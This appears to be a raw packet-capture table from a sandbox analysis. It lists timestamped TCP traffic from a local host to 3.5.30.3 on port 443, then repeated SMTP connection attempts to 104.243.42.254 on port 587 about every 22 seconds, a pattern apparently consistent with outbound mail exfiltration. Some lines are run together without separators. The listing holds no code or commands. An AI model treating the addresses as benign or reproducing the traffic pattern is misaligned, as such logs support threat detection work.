                                                                                                                      Dec 6, 2024 11:04:40.986201048 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.986208916 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.986227989 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.992677927 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.992722988 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.992769957 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.992778063 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.992804050 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:40.999960899 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:40.999994040 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.000046015 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.000051022 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.000062943 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.000072002 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.000122070 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.149912119 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.149936914 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.149974108 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.149993896 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.150007963 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.150042057 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.155378103 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.155396938 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.155519962 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.155519962 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.155529022 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.161890030 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.161936998 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.161967993 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.161976099 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.162025928 CET49718443192.168.2.63.5.30.3
Dec 6, 2024 11:04:41.162796021 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.162836075 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.168464899 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.168482065 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.168562889 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.168571949 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.168615103 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.169243097 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.175822020 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.175838947 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.175910950 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.175920010 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.182008982 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.182028055 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.182127953 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.182127953 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.182137012 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.188504934 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.188545942 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.188606977 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.188606977 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.188616037 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.195066929 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.195105076 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.195336103 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.195344925 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.247211933 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.247227907 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.295178890 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.344839096 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.344851017 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.344890118 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.344923019 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.344930887 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.344938040 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.344950914 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.344964981 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.344983101 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.351381063 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.351407051 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.351480007 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.351488113 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.351521015 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.357857943 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.357872009 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.357944965 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.357952118 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.364408970 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.364455938 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.364481926 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.364491940 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.364536047 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.371444941 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.371509075 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.371536016 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.371542931 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.371557951 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.371582031 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.371602058 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.378002882 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.378020048 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.378097057 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.378118038 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.378124952 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.378165960 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.384455919 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.384475946 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.384556055 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.384565115 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.438175917 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.438186884 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.486212969 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.534066916 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.534080029 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.534116983 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.534132957 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.534163952 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.534178019 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.534194946 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.534226894 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.539813995 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.539833069 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.539851904 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.539901972 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.539911985 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.539953947 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.540610075 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.540661097 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.546317101 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.546333075 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.546386003 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.546394110 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.546436071 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.547151089 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.552894115 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.552907944 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.552964926 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.552974939 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.560302973 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.560340881 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.560376883 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.560384035 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.560394049 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.560425043 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.560451031 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.566416979 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.566435099 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.566514969 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.566525936 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.566566944 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.567208052 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.572922945 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.572937012 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.573012114 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.573020935 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.580281019 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.580310106 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.580369949 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.580379963 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.580413103 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.580440998 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.728780031 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.728811026 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.728904963 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.728918076 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.729037046 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.729558945 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.736118078 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.736134052 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.736176968 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.736187935 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.736218929 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.742631912 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.742655993 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.742700100 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.742707968 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.742791891 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.743010998 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.743081093 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.749182940 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.749197960 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.749264956 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.749273062 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.749314070 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.749366045 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.755466938 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.755481958 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.755572081 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.755579948 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.762682915 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.762718916 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.762799025 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.762809038 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.762878895 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.769211054 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.769224882 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.769274950 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.769304991 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.769346952 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.769351959 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.828479052 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.918777943 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.918802977 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.918859959 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.918865919 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.918875933 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.918930054 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.924700022 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.924715042 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.924807072 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.924843073 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.924860954 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.924946070 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.931322098 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.931338072 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.931365013 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.931384087 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.931392908 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.935122013 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.937912941 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.937932968 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.937992096 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.938002110 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.938036919 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.944328070 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.944370985 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.944478035 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.944478035 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.944497108 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.951450109 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.951493979 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.951539040 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.951550961 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.951581955 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.953116894 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.953166008 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.953172922 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.953202009 CET    443    49718    3.5.30.3    192.168.2.6
Dec 6, 2024 11:04:41.953214884 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.953243971 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.954341888 CET    49718    443    192.168.2.6    3.5.30.3
Dec 6, 2024 11:04:41.954997063 CET    49718    443    192.168.2.6    3.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.955008984 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:41.955020905 CET49718443192.168.2.63.5.30.3
                                                                                                                      Dec 6, 2024 11:04:41.955024958 CET443497183.5.30.3192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:46.429469109 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:04:46.550275087 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:04:46.551199913 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:04:46.556313038 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:04:46.676202059 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:08.868566990 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:08.868640900 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:08.868690968 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:08.868722916 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:08.868738890 CET497305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:08.988600969 CET587449730104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:09.024956942 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:09.147058010 CET587449785104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:09.147212029 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:09.151642084 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:09.272100925 CET587449785104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:31.035358906 CET587449785104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:31.035427094 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:31.035489082 CET497855874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:31.155246973 CET587449785104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:32.048573971 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:32.170948982 CET587449856104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:32.171051979 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:32.175039053 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:32.294866085 CET587449856104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:54.067122936 CET587449856104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:54.067255020 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.067255020 CET498565874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.068022013 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.188878059 CET587449856104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:54.189174891 CET587449914104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:05:54.189276934 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.193501949 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:05:54.313479900 CET587449914104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:16.114744902 CET587449914104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:16.114806890 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:16.114850044 CET499145874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:16.234723091 CET587449914104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:17.126903057 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:17.247009039 CET587449967104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:17.247102022 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:17.289747000 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:17.409507990 CET587449967104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:39.162054062 CET587449967104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:39.162174940 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.162174940 CET499675874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.163062096 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.281975031 CET587449967104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:39.282757044 CET587450018104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:06:39.282905102 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.287462950 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:06:39.408077955 CET587450018104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:01.193840027 CET587450018104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:01.193957090 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:01.194004059 CET500185874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:01.313745975 CET587450018104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:02.218849897 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:02.338536978 CET587450028104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:02.338625908 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:02.342344046 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:02.462030888 CET587450028104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:24.256603956 CET587450028104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:24.260478973 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.260478973 CET500285874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.287060022 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.380312920 CET587450028104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:24.406891108 CET587450030104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:24.406996965 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.428097963 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:24.547996998 CET587450030104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:46.319555998 CET587450030104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:46.319798946 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:46.319843054 CET500305874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:46.439730883 CET587450030104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:47.331578016 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:47.451697111 CET587450031104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:07:47.451777935 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:47.456345081 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:07:47.576332092 CET587450031104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:09.366980076 CET587450031104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:09.367054939 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.367120981 CET500315874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.368045092 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.487066031 CET587450031104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:09.487739086 CET587450032104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:09.487812996 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.492616892 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:09.612917900 CET587450032104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:31.397094011 CET587450032104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:31.397224903 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:31.397270918 CET500325874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:31.517879009 CET587450032104.243.42.254192.168.2.6
                                                                                                                      Dec 6, 2024 11:08:32.407499075 CET500335874192.168.2.6104.243.42.254
                                                                                                                      Dec 6, 2024 11:08:32.527394056 CET587450033104.243.42.254192.168.2.6
